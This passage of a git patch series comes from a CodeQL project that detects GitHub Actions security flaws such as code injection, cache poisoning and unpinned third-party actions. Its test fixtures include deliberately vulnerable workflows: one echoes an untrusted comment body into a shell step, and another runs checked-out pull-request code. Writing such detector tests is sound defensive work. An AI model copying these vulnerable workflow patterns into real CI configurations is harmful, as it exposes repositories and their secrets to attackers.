steps.changed-files4.outputs.all_changed_files }}; do + echo "$file was changed" + done + + - name: Get changed files 5 + id: changed-files5 + uses: tj-actions/changed-files@95690f9ece77c1740f4a55b7f1de9023ed6b1f87 # v39.2.3 + - name: List all changed files 5 + run: | + for file in ${{ steps.changed-files5.outputs.all_changed_files }}; do + echo "$file was changed" + done diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index e9738fa9458f..9e479f9eaf49 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -8,6 +8,7 @@ edges | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | +| .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | @@ -87,6 +88,8 @@ nodes | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | semmle.label | steps.changed-files1.outputs.all_changed_files | | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | semmle.label | Uses Step: changed-files3 | | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | semmle.label | steps.changed-files3.outputs.all_changed_files | +| .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | semmle.label | Uses Step: changed-files5 | +| .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | semmle.label | steps.changed-files5.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | @@ -247,6 +250,7 @@ subpaths #select | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | ${{ steps.changed-files1.outputs.all_changed_files }} | | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | ${{ steps.changed-files3.outputs.all_changed_files }} | +| .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | ${{ steps.changed-files5.outputs.all_changed_files }} | | .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | ${{ env.log }} | | action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | action1/action.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index 048b0446f5f2..738270e3ccd8 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected @@ -8,6 +8,7 @@ edges | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | +| .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | @@ -87,6 +88,8 @@ nodes | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | semmle.label | steps.changed-files1.outputs.all_changed_files | | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | semmle.label | Uses Step: changed-files3 | | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | semmle.label | steps.changed-files3.outputs.all_changed_files | +| .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | semmle.label | Uses Step: changed-files5 | +| .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | semmle.label | steps.changed-files5.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 0ba7832e8e8f..dbbfba0a5574 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected @@ -1,17 +1,17 @@ -| .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Uses Step | -| .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Uses Step | -| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Uses Step | -| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Uses Step | -| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref 'v3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | -| .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | -| .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref 'v2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | -| .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Uses Step: comment-branch | -| .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Uses Step: comment-branch | +| .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref '2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref '1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Uses Step | +| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref '3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | +| .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref '5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | +| .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref '2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | +| .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref '2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Uses Step: comment-branch | +| .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref '2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Uses Step: comment-branch | | .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'eficode/resolve-pr-refs' with ref 'main', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | Uses Step: refs | -| .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | -| .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | -| .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.0.2', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | -| .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | -| .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | -| .github/workflows/level0.yml:36:9:39:6 | Uses Step | Unpinned 3rd party Action 'Poutine Level 0' step $@ uses 'rlespinasse/github-slug-action' with ref 'v4', not a pinned commit hash | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Uses Step | -| .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | +| .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref '2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | +| .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref '2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | +| .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref '2.0.2', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | +| .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref '2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | +| .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref '1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | +| .github/workflows/level0.yml:36:9:39:6 | Uses Step | Unpinned 3rd party Action 'Poutine Level 0' step $@ uses 'rlespinasse/github-slug-action' with ref '4', not a pinned commit hash | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Uses Step | +| .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref '1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | From d3bb6668f6fca4eb93a8f909bb1f49f5e7f5550d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 09:44:48 +0200 Subject: [PATCH 246/707] Missing getMajorVersion predicate --- ql/lib/codeql/actions/Ast.qll | 2 ++ 1 file changed, 2 insertions(+) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index bfbc990d6712..6d80c67f7fd5 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -372,6 +372,8 @@ abstract class Uses extends AstNode instanceof UsesImpl { string getVersion() { result = super.getVersion() } + int getMajorVersion() { result = super.getMajorVersion() } + string getArgument(string argName) { result = super.getArgument(argName) } Expression getArgumentExpr(string argName) { result = super.getArgumentExpr(argName) } From c39e802c1729d0a9a41e00246686d9395d3bec07 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 13:56:49 +0200 Subject: [PATCH 247/707] Fix sources for tj-actions/verify-changed-files --- ql/lib/codeql/actions/dataflow/FlowSources.qll | 15 ++++++++++++++- 1 file changed, 14 insertions(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index bfe85dbdbe6a..9e4c258e39ab 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -349,7 +349,20 @@ class TJActionsVerifyChangedFilesSource extends RemoteFlowSource { u.getCallee() = "tj-actions/verify-changed-files" and ( u.getArgument("safe_output") = "false" or - u.getMajorVersion() < 17 + u.getMajorVersion() < 17 or + u.getVersion() + .matches([ + "54e20d3", "a9b6fd3", "30aa174", "7f1b21c", "54e20d3", "0409e18", "7da22d0", + "7016858", "0409e18", "7517b83", "bad2f5d", "3b573ac", "7517b83", "f557547", + "9ed3155", "f557547", "a3391b5", "a3391b5", "1d7ee97", "c432297", "6e986df", + "fa6ea30", "6f40ee1", "1b13d25", "c09bcad", "fda469d", "bd1e271", "367ba21", + "9dea97e", "c154cc6", "527ff75", "e8756d5", "bcb4e76", "25267f5", "ea24bfd", + "f2a40ba", "197e121", "a8f1b11", "95c26dd", "97ba4cc", "68310bb", "720ba6a", + "cedd709", "d68d3d2", "2e1153b", "c3dd635", "81bd1de", "31a9c74", "e981d37", + "e7f801c", "e86d0b9", "ad255a4", "3a8aed1", "de910b5", "d31b2a1", "e61c6fc", + "380890d", "873cfd6", "b0c60c8", "7183183", "6555389", "9828a95", "8150cee", + "48ddf88" + ] + "%") ) and this.asExpr() = u ) From b965a55339d8f4ba98ac701c394a5573a90e94cf Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 15:04:48 +0200 Subject: [PATCH 248/707] Fix error in select Casting to CachingWritingStep in the select clause was shadowing all the Poisonable result --- ql/src/Security/CWE-349/CachePoisoning.ql | 19 +++++++++++-------- .../CWE-349/.github/workflows/test8.yml | 19 +++++++++++++++++++ 2 files changed, 30 insertions(+), 8 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test8.yml diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index e0d59a02ab49..bf18df4797dc 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -22,13 +22,16 @@ where // TODO: (require to collect trigger types) // - add push to default branch? // - exclude pull_request_target when branches_ignore includes default branch or when branches does not include the default branch - j.getEnclosingWorkflow() - .hasTriggerEvent([ - "check_run", "check_suite", "delete", "discussion", "discussion_comment", "fork", - "gollum", "issue_comment", "issues", "label", "milestone", "project", "project_card", - "project_column", "public", "pull_request_comment", "pull_request_target", - "repository_dispatch", "schedule", "watch", "workflow_run" - ]) and + ( + j.getEnclosingWorkflow().hasTriggerEvent(defaultBranchTriggerEvent()) + or + j.getEnclosingWorkflow().hasTriggerEvent("workflow_call") and + exists(ExternalJob call, Workflow caller | + call.getCallee() = j.getLocation().getFile().getRelativePath() and + caller = call.getWorkflow() and + caller.hasTriggerEvent(defaultBranchTriggerEvent()) + ) + ) and // The job checkouts untrusted code from a pull request j.getAStep() = checkout and ( @@ -40,4 +43,4 @@ where // (The cache specific token can be leaked even for non-privileged workflows) checkout.getAFollowingStep() instanceof PoisonableStep ) -select j.getAStep().(CacheWritingStep), "Potential cache poisoning on privileged workflow." +select checkout, "Potential cache poisoning on privileged workflow." diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test8.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test8.yml new file mode 100644 index 000000000000..68d3f7f75ac4 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test8.yml @@ -0,0 +1,19 @@ +on: + issue_comment: + types: [created] + +jobs: + pr-comment: + runs-on: ubuntu-latest + steps: + - uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + + - uses: actions/checkout@v3 + if: success() + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + + - run: | + ./checkedout/poison + From fafb44d4f662f551e1c0d7cc3969cd4a08df43f3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 15:20:48 +0200 Subject: [PATCH 249/707] Add CachePoisoning by Code Injection query --- .../actions/security/CachePoisoningQuery.qll | 17 ++++++++ .../CWE-349/CachePoisoningByCodeInjection.ql | 41 +++++++++++++++++++ .../CWE-349/.github/workflows/test9.yml | 12 ++++++ .../Security/CWE-349/CachePoisoning.expected | 11 ++--- .../CachePoisoningByCodeInjection.expected | 6 +++ .../CachePoisoningByCodeInjection.qlref | 2 + 6 files changed, 84 insertions(+), 5 deletions(-) create mode 100644 ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test9.yml create mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected create mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.qlref diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index 6668ef9777d6..9762e9d90784 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -1,5 +1,15 @@ import actions +string defaultBranchTriggerEvent() { + result = + [ + "check_run", "check_suite", "delete", "discussion", "discussion_comment", "fork", "gollum", + "issue_comment", "issues", "label", "milestone", "project", "project_card", "project_column", + "public", "pull_request_comment", "pull_request_target", "repository_dispatch", "schedule", + "watch", "workflow_run" + ] +} + abstract class CacheWritingStep extends Step { } class CacheActionUsesStep extends CacheWritingStep, UsesStep { @@ -60,3 +70,10 @@ class SetupDotnetUsesStep extends CacheWritingStep, UsesStep { ) } } + +class SetupRubyUsesStep extends CacheWritingStep, UsesStep { + SetupRubyUsesStep() { + this.getCallee() = ["actions/setup-ruby", "ruby/setup-ruby"] and + this.getArgument("bundler-cache") = "true" + } +} diff --git a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql new file mode 100644 index 000000000000..2de07ec17bd1 --- /dev/null +++ b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql @@ -0,0 +1,41 @@ +/** + * @name Cache Poisoning via low-privilege code injection + * @description The cache can be poisoned by untrusted code, leading to a cache poisoning attack. + * @kind path-problem + * @problem.severity error + * @precision high + * @security-severity 9.3 + * @id actions/cache-poisoning/code-injection + * @tags actions + * security + * external/cwe/cwe-349 + * external/cwe/cwe-094 + */ + +import actions +import codeql.actions.security.CodeInjectionQuery +import codeql.actions.security.CachePoisoningQuery +import CodeInjectionFlow::PathGraph + +from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, LocalJob j +where + CodeInjectionFlow::flowPath(source, sink) and + j = sink.getNode().asExpr().getEnclosingJob() and + not j.isPrivileged() and + // The workflow runs in the context of the default branch + // TODO: (require to collect trigger types) + // - add push to default branch? + // - exclude pull_request_target when branches_ignore includes default branch or when branches does not include the default branch + ( + j.getEnclosingWorkflow().hasTriggerEvent(defaultBranchTriggerEvent()) + or + j.getEnclosingWorkflow().hasTriggerEvent("workflow_call") and + exists(ExternalJob call, Workflow caller | + call.getCallee() = j.getLocation().getFile().getRelativePath() and + caller = call.getWorkflow() and + caller.hasTriggerEvent(defaultBranchTriggerEvent()) + ) + ) +select sink.getNode(), source, sink, + "Potential code injection in $@, which may be controlled by an external user.", sink, + sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test9.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test9.yml new file mode 100644 index 000000000000..3b646b795ac2 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test9.yml @@ -0,0 +1,12 @@ +on: + issue_comment: + types: [created] + +jobs: + pr-comment: + runs-on: ubuntu-latest + permissions: {} + steps: + - run: | + echo ${{ github.event.comment.body }} + diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected index 6e0030ad3832..67cdea32c5d1 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected @@ -1,5 +1,6 @@ -| .github/workflows/test1.yml:17:9:21:6 | Uses Step | Potential cache poisoning on privileged workflow. | -| .github/workflows/test2.yml:12:9:16:6 | Uses Step | Potential cache poisoning on privileged workflow. | -| .github/workflows/test3.yml:12:9:20:6 | Uses Step | Potential cache poisoning on privileged workflow. | -| .github/workflows/test6.yml:12:9:16:6 | Uses Step | Potential cache poisoning on privileged workflow. | -| .github/workflows/test7.yml:12:9:15:6 | Uses Step | Potential cache poisoning on privileged workflow. | +| .github/workflows/test1.yml:12:9:17:6 | Uses Step | Potential cache poisoning on privileged workflow. | +| .github/workflows/test2.yml:9:9:12:6 | Uses Step | Potential cache poisoning on privileged workflow. | +| .github/workflows/test3.yml:9:9:12:6 | Uses Step | Potential cache poisoning on privileged workflow. | +| .github/workflows/test6.yml:9:9:12:6 | Uses Step | Potential cache poisoning on privileged workflow. | +| .github/workflows/test7.yml:9:9:12:6 | Uses Step | Potential cache poisoning on privileged workflow. | +| .github/workflows/test8.yml:12:9:17:6 | Uses Step | Potential cache poisoning on privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected new file mode 100644 index 000000000000..5f244aa2faf8 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected @@ -0,0 +1,6 @@ +edges +nodes +| .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | semmle.label | github.event.comment.body | +subpaths +#select +| .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.qlref b/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.qlref new file mode 100644 index 000000000000..cd1a90049a64 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.qlref @@ -0,0 +1,2 @@ +Security/CWE-349/CachePoisoningByCodeInjection.ql + From 409a6aa1373db2063058cdc14a59c3d3887895ae Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 18:48:16 +0200 Subject: [PATCH 250/707] Update ql/src/Security/CWE-349/CachePoisoning.ql MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Jaroslav LobaÄevski --- ql/src/Security/CWE-349/CachePoisoning.ql | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git 